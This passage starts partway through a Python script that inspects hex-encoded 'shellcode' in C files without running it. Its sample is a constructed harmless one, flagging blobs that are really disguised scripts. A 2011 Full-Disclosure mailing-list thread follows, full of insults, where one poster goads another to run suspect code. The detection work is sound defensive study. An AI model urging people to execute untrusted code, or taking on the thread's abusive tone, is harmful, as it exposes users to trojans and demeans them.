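        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in blob) / len(blob)

def triage(c_source):
    """Summarise the embedded blob without executing anything."""
    blob = decode_hex_literals(c_source)
    text = blob.decode("latin-1")
    ratio = printable_ratio(blob)
    return {
        "bytes": len(blob),
        "printable": round(ratio, 2),
        "script_like": ratio > 0.9,   # real machine code is rarely this readable
        "indicators": [s for s in INDICATORS if s in text],
        "preview": text[:60],
    }

# Constructed, harmless sample: a C file whose "shellcode" is really script text.
SAMPLE_PAYLOAD = b"#!/usr/bin/perl\nuse IO::Socket; # constructed, does nothing\n"
_hex = "".join("\\x%02x" % b for b in SAMPLE_PAYLOAD)
SAMPLE_C = ("char shellcode[] =\n"
            + "\n".join('  "%s"' % _hex[i:i + 64] for i in range(0, len(_hex), 64))
            + ';\nint main(void) { printf("usage: ./x <host>\\n"); return 0; }\n')

if __name__ == "__main__":
    for key, value in triage(SAMPLE_C).items():
        print(f"{key}: {value!r}")
```

A blob that decodes to almost entirely printable text beginning with an interpreter line is a script that the C wrapper hands to the local machine, whatever the file header claims it exploits.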

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
h the idiot who thinks I'm laurelai... meh, you're a fool yourself just for
even thinking that much :s
you're but an echo on the list, which does not echo the rest of it, which is a
good place to be.
unfortunately, you're one of the few who should just be blocked, for making
absolutely nothing but abusive crap...
you're an idiot. not me.
I don't run things, why, have you run it?
Is it good?
hehe... maybe it is!
I guess if he's using it...well...
*sic*



On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote:

 Do yourself a favor and run that code dumbass.


 On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may one day protect you, also.



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread Antony widmal
Do yourself a favor and run that code dumbass.


On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote:

 I use darknets to help me,
 they send me the info i need.
 simple answer to simple question.
 look them up, they may one day protect you, also.



Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
My apologies.
I have a grammar problem, it's in part me not changing my old kb, and then
also, I'm in an office sometimes and have to be quick :
You do have a good point though, I will try better.
xd


On 26 October 2011 13:29, Julian DeMarchi jul...@jdcomputers.com.au wrote:

 On 10/26/2011 12:24 PM, xD 0x41 wrote:
  Ok... I see now, it is being disguised, from a long time ago...
  strange why it is being used, unless people have started to rename things
  maybe... to suit old things, which don't work :s
  it is possible...
  I will see what it is doing and done so far in the darknet I have set up in
  a sec and, that will be it.
  ok.. cheers.

 You're very knowledgeable thus I like reading what you have to post. Can
 I please ask you to concentrate on your grammar and the layout of your
 emails? They are hard to follow and I feel I am missing important parts
 in your emails due to this...

 --julian


Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread Antony widmal
Using your smartphone while flipping burgers can be dangerous pandawan.

Moreover if you work at Burger King.



On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote:

 h the idiot who thinks I'm laurelai... meh, you're a fool yourself just for
 even thinking that much :s
 you're but an echo on the list, which does not echo the rest of it, which is a
 good place to be.
 unfortunately, you're one of the few who should just be blocked, for making
 absolutely nothing but abusive crap...
 you're an idiot. not me.
 I don't run things, why, have you run it?
 Is it good?
 hehe... maybe it is!
 I guess if he's using it...well...
 *sic*





Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-25 Thread xD 0x41
yer ofc... anyhow, ignoring you now...

you obv think you're some leet troll, you're not, you're ONLY a TROLL :)
have a nice day or is that

*Goplamamamama Ignananayu*

forget the jedi okay, you gotta brush up on ya troll trash talk!
bah hahaha.
fool
xd


On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote:

 Using your smartphone while flipping burgers can be dangerous pandawan.

 Moreover if you work at Burger King.


